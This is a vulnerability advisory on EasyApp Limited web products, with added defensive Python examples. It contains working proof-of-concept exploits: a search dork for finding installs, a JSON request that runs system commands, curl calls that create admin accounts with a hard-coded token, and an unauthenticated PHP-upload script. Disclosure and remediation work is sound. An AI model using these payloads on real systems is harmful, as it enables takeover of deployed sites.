EasyApp Limited: In-Depth Analysis of Multiple Security Vulnerabilities

This article discloses serious security vulnerabilities in several EasyApp Limited products: unauthenticated remote code execution through a PHP function named by the client (filed by the advisory as PHP object injection), an authentication bypass via a hard-coded token, and unauthenticated file upload, deletion and listing. Full technical analysis and verification steps are provided.

EasyApp Limited - Multiple Security Vulnerabilities

2025.08.23 Credit: bRpsd

Risk level: Medium  Local vulnerability: No  Remote vulnerability: Yes  CVE: N/A  CWE: N/A  Dork: Powered By EasyApp Limited inurl:app/web

Vulnerability Details

Vulnerability 1: PHP Object Injection (CWE-502: Deserialization of Untrusted Data)

The handler reads the raw request body from php://input, decodes it as JSON without any validation, and then calls the function named in "action" with the client-supplied "data" as its argument, giving unauthenticated remote code execution. The advisory files this under CWE-502; note that the code below never unserializes anything: it is a user-controlled variable function call (CWE-94), so no deserialization gadget is needed, only a function name such as system. File: /app/php/data.php

Code:

$path = $_SERVER['DOCUMENT_ROOT'];
include_once($path);
$json = json_decode(file_get_contents("php://input"),true); 
// call the custom function named by the client: both the callee ("action")
// and its argument ("data") come straight from the request body
echo json_encode($json["action"]($json["data"]));

Proof of Concept:

POST https://localhost/app/php/data.php HTTP/1.1
host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:142.0) Gecko/20100101 Firefox/142.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
content-length: 35
Connection: keep-alive

{"action":"system","data":"whoami"}

Response:
HTTP/1.1 200 OK
Date: Thu, 15 Aug 2025 14:19:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive

root
"root"

Using cURL:

curl -X POST https://localhost/app/php/data.php \
-H "Content-Type: application/json" \
-d '{"action":"system","data":"uname"}'

"Darwin"
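The advisory does not show a fixed version of data.php. As an added example (not EasyApp's code), the following Python models the same endpoint with the function-name lookup replaced by an explicit allowlist: the client can only choose among the handlers listed in HANDLERS, so a body like the PoC's {"action":"system","data":"whoami"} is rejected before anything is called. The handler names getNews/listNews, their argument checks and the body-size limit are constructed for illustration.

```python
import json

# Constructed stand-ins for the application's real actions; the names
# getNews/listNews are hypothetical, not taken from EasyApp's code.
def get_news(data):
    if not isinstance(data, dict):
        raise ValueError("data must be an object")
    news_id = data.get("id")
    if not isinstance(news_id, int) or isinstance(news_id, bool):
        raise ValueError("id must be an integer")
    return {"id": news_id, "title": "stub"}


def list_news(data):
    return {"items": []}


# The only names a request may invoke. Anything else, including "system",
# "exec" or "passthru", is rejected before any call happens.
HANDLERS = {
    "getNews": get_news,
    "listNews": list_news,
}

MAX_BODY = 64 * 1024  # constructed limit on the raw request body


def dispatch(raw_body: bytes):
    """Model of the data.php endpoint: returns (HTTP status, response object).

    Replaces $json["action"]($json["data"]) with a dictionary lookup, so the
    client selects one of the listed handlers instead of naming a PHP function.
    """
    if len(raw_body) > MAX_BODY:
        return 413, {"error": "body too large"}
    try:
        req = json.loads(raw_body.decode("utf-8"))
    except (UnicodeDecodeError, ValueError):
        return 400, {"error": "malformed JSON"}
    if not isinstance(req, dict) or not isinstance(req.get("action"), str):
        return 400, {"error": "missing action"}
    handler = HANDLERS.get(req["action"])
    if handler is None:
        return 400, {"error": "unknown action"}
    try:
        return 200, handler(req.get("data"))
    except ValueError as exc:
        return 400, {"error": str(exc)}


if __name__ == "__main__":
    # The page's PoC body, replayed against the allowlisted dispatcher.
    print(dispatch(b'{"action":"system","data":"whoami"}'))
    print(dispatch(b'{"action":"getNews","data":{"id":7}}'))
```

The same shape carries over to PHP directly: a constant array mapping action strings to closures, looked up with isset() before the call, removes the attacker's ability to reach system() or any other function regardless of what the JSON contains.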

Vulnerability 2: Static Token Bypass (CWE-798: Use of Hard-coded Credentials)

File: /app/admin2/php/data.php

Code:

function getAppAccessRight($functionName,$param)
{
    $data = array();
    $data["status"] = "SUCCESS"; 
    $uid = $_COOKIE["uid"]; 
    $token = $_COOKIE["token"]; 
    $escapeFunction = ESCAPE_FUNC_TOKEN;   // string of function names exempt from the check (value not shown in the advisory)
    
    // substring search: any $functionName that occurs inside the exempt string passes
    if (strpos($escapeFunction, $functionName) !== false)
        return $data; 
    // static token, identical in every installation, compared against a client-controlled cookie
    if ($token == "abcdefghijklmnopqrstuvwxyz1234567890")
        return $data;
    // ... remainder of the function is not shown in the advisory
}

Because the token is a constant in the source, anyone who has read it can call any admin function exposed by /app/admin2/php/data.php simply by sending it in the token cookie. (The Cookie header in the PoC below carries token= twice; PHP populates $_COOKIE from the first occurrence of a duplicated cookie name, so the hard-coded value is the one compared.)

Proof of Concept:

# Update an admin account
curl -X POST \
  'https://localhost/app/admin2/php/data.php' \
  -H 'Cookie: token=abcdefghijklmnopqrstuvwxyz1234567890; blogin=true; uid=1; logined=true; token=true' \
  -H 'Content-Type: application/json' \
  -d '{
    "action": "updateAdmin",
    "data": {
      "fullname": "X",
      "loginid": "XXXXXXXXXX",
      "pwd": "XXXXXXXXXX",
      "email": "X@X.com",
      "role": "ADMIN",
      "userid": "1",
      "imgattachid": "1"
    }
  }'

Response: {"uid":"UID_HERE","status":"SUCCESS"}

# Create an admin account
curl -X POST \
  'https://localhost/app/admin2/php/data.php' \
  -H 'Cookie: token=abcdefghijklmnopqrstuvwxyz1234567890; blogin=true; uid=1; logined=true; token=true' \
  -H 'Content-Type: application/json' \
  -d '{
    "action": "createAdmin",
    "data": {
      "fullname": "X",
      "loginid": "X",
      "pwd": "X",
      "email": "X@X.com",
      "role": "ADMIN",
      "userid": "1",
      "imgattachid": "1"
    }
  }'

Response: {"uid":"UID_HERE","status":"SUCCESS"}
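For comparison, an added example (not EasyApp's code) of how the two shortcuts in getAppAccessRight above can be replaced, written in Python as a model of the logic: the exempt-function list becomes an exact-match set instead of the strpos substring search, and the hard-coded token becomes a per-login random value stored server-side and compared in constant time. The SESSIONS store, the exempt names login/forgotPassword and the sample ESCAPE_FUNC_TOKEN string are constructed; the advisory does not show the real constant's value.

```python
import hmac
import secrets

# Constructed session store (uid -> token issued at login). In a real
# application this lives in the database or PHP session, not a module global.
SESSIONS = {}

# Constructed value standing in for ESCAPE_FUNC_TOKEN, whose real contents the
# advisory does not show.
ESCAPE_FUNC_TOKEN = "login,forgotPassword"


def is_public_strpos(function_name: str) -> bool:
    """The page's check: strpos($escapeFunction, $functionName) !== false.

    Python's ``in`` on strings is the same substring test, so any name that
    happens to occur inside the list ("log", "in", "Pass") is treated as exempt.
    """
    return function_name in ESCAPE_FUNC_TOKEN


PUBLIC_FUNCTIONS = frozenset(ESCAPE_FUNC_TOKEN.split(","))


def is_public(function_name: str) -> bool:
    """Exact match against the split list: "log" is no longer exempt."""
    return function_name in PUBLIC_FUNCTIONS


def issue_token(uid: int) -> str:
    """Called at login: 256 bits from the CSPRNG, different for every session."""
    token = secrets.token_hex(32)
    SESSIONS[uid] = token
    return token


def get_app_access_right(function_name: str, cookies: dict) -> bool:
    """Replacement for the page's getAppAccessRight: True only for public
    functions or for a token equal to the one issued to that uid."""
    if is_public(function_name):
        return True
    uid, token = cookies.get("uid"), cookies.get("token")
    if uid is None or token is None:
        return False
    try:
        expected = SESSIONS.get(int(uid))
    except ValueError:
        return False
    if expected is None:
        return False
    # Constant-time comparison on bytes, so non-ASCII cookie values cannot raise.
    return hmac.compare_digest(expected.encode(), token.encode())
```

With this structure there is no literal secret in the source to leak: the advisory's token "abcdefghijklmnopqrstuvwxyz1234567890" is simply never equal to a value SESSIONS holds for any uid.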

Vulnerability 3: Unauthenticated Arbitrary File Upload, Deletion and Disclosure

Path: app/admin2/userimg

Requesting the path directly returns a listing of the files uploaded to /app/admin2/userimg/, including a per-file deleteUrl with deleteType DELETE, so an unauthenticated client can enumerate and remove uploads:

Example:

{"files":[{"name":"x.jpg","size":4,"url":"https:\/\/localhost\/app\/admin2\/userimg\/files\/x.jpg","deleteUrl":"https:\/\/localhost.hk\/app\/admin2\/userimg\/index2.php?file=x.jpg","deleteType":"DELETE"}]}

Python script that uploads a PHP file to the endpoint (the PoC uses the mixed-case name x.PhP):

import requests

url = "https://localhost/app/admin2/userimg/"
headers = {
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:141.0) Gecko/20100101 Firefox/141.0",
    "Accept": "application/json, text/javascript, */*; q=0.01",
    "Accept-Language": "en-US,en;q=0.5",
    "Accept-Encoding": "gzip, deflate, br, zstd",
    "X-Requested-With": "XMLHttpRequest",
    "Origin": "https://localhost/",
    "Connection": "keep-alive",
    "Referer": "https://localhost/app/admin2/news-list-add.php",
    "Sec-Fetch-Dest": "empty",
    "Sec-Fetch-Mode": "cors",
    "Sec-Fetch-Site": "same-origin"
}

# extra form fields sent alongside the file, as the admin news-list-add page does
payload = {
    'attachid': '1',
    'gtitle_zh': '1',
    'linkid': '1'
}

# file part: mixed-case .PhP extension, body is the 4-byte string "test"
files = {
    'files[]': ('x.PhP', 'test', 'multipart/form-data')
}

# no session cookie is sent: the request is entirely unauthenticated
response = requests.post(url, headers=headers, data=payload, files=files)

print(f"Status Code: {response.status_code}")
print("Response Text:", response.text)
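The page gives no fixed upload handler. As an added example (not EasyApp's code), this Python validator shows the checks that would have stopped the x.PhP upload and the usual variants of it: a case-insensitive extension allowlist, a filename with exactly one extension and no path characters, a content signature that matches the claimed type, and a random server-chosen stored name. The allowlist, the size limit and the sample byte strings are constructed for illustration.

```python
import re
import secrets

# Constructed allowlist: lower-case extension -> accepted leading byte signatures.
ALLOWED_TYPES = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
MAX_SIZE = 2 * 1024 * 1024  # constructed limit

# Exactly one extension; the stem may not contain dots, slashes, NULs or spaces.
_NAME_RE = re.compile(r"[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})")


def validate_upload(filename: str, content: bytes):
    """Return (True, stored_name) for an acceptable image, else (False, reason).

    Rejects the page's PoC (x.PhP: the extension is compared after lowercasing),
    double extensions such as x.php.jpg, traversal in the name, and files whose
    bytes do not match the claimed image type.
    """
    if not content or len(content) > MAX_SIZE:
        return False, "bad size"
    m = _NAME_RE.fullmatch(filename)
    if m is None:
        return False, "bad filename"
    ext = m.group(1).lower()
    signatures = ALLOWED_TYPES.get(ext)
    if signatures is None:
        return False, "extension not allowed"
    if not any(content.startswith(sig) for sig in signatures):
        return False, "content does not match extension"
    # Random server-chosen name: the client picks neither the path nor a name
    # that could overwrite another upload.
    return True, f"{secrets.token_hex(16)}.{ext}"
```

Validation alone does not close the issue described above: the directory must also be served with script execution disabled, and the listing and deleteUrl endpoints need the same authentication as the rest of /app/admin2/.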

Other Security Weaknesses

  1. Access to /app/admin2/ is blocked only by an HTML/JavaScript redirect rather than a server-side PHP check, so anyone can load the admin dashboard, read its HTML source and tamper with it.

  2. Authentication relies on the HTTP_CLIENT_IP and HTTP_X_FORWARDED_FOR request headers, which any client can set, so the IP-based check can be spoofed.

  3. Weak cryptographic algorithms.

  4. No CSRF, XSS or SQL injection controls.

  5. Poor code-quality control, e.g. the exempt-function check is a substring search, strpos($escapeFunction, $functionName), rather than an exact match against the list (the advisory reads the arguments as reversed, i.e. strpos($functionName, $escapeFunction)), and "TRUE" is misspelled "TURE" in the 2FA activation code.

  6. Reachable test files such as /app/admin2/testFn.php [arbitrary file upload] and other vulnerable endpoints.
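Item 2 above is the classic trust-the-header mistake. As an added example (not EasyApp's code), the Python below contrasts the header-first lookup the advisory describes with a resolver that consults X-Forwarded-For only when the TCP peer is a known proxy and then takes the right-most hop that is not itself a proxy. The TRUSTED_PROXIES networks and the sample addresses are constructed; PHP's HTTP_CLIENT_IP and HTTP_X_FORWARDED_FOR correspond to the Client-IP and X-Forwarded-For headers used here.

```python
import ipaddress

# Constructed: address ranges of the reverse proxies / load balancers that are
# allowed to speak for the client.
TRUSTED_PROXIES = [
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("127.0.0.0/8"),
]


def _is_trusted(addr) -> bool:
    return any(addr in net for net in TRUSTED_PROXIES)


def client_ip_naive(remote_addr: str, headers: dict) -> str:
    """The pattern the advisory describes: whatever the client puts in
    Client-IP ($_SERVER['HTTP_CLIENT_IP']) or X-Forwarded-For wins."""
    if headers.get("Client-IP"):
        return headers["Client-IP"].strip()
    if headers.get("X-Forwarded-For"):
        return headers["X-Forwarded-For"].split(",")[0].strip()
    return remote_addr


def client_ip(remote_addr: str, headers: dict) -> str:
    """Use X-Forwarded-For only if the socket peer is a trusted proxy, and take
    the right-most hop that is not a trusted proxy (proxies append to the
    header, so anything the client supplied sits on the left)."""
    peer = ipaddress.ip_address(remote_addr)
    if not _is_trusted(peer):
        return str(peer)  # direct connection: every header is attacker-controlled
    raw = headers.get("X-Forwarded-For", "")
    hops = [h.strip() for h in raw.split(",") if h.strip()]
    for hop in reversed(hops):
        try:
            addr = ipaddress.ip_address(hop)
        except ValueError:
            return str(peer)  # malformed entry: fall back to the proxy's address
        if not _is_trusted(addr):
            return str(addr)
    return str(peer)
```

Even with the resolver fixed, an IP address is a weak basis for authentication; it belongs in logging and rate limiting, not in place of a session check.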
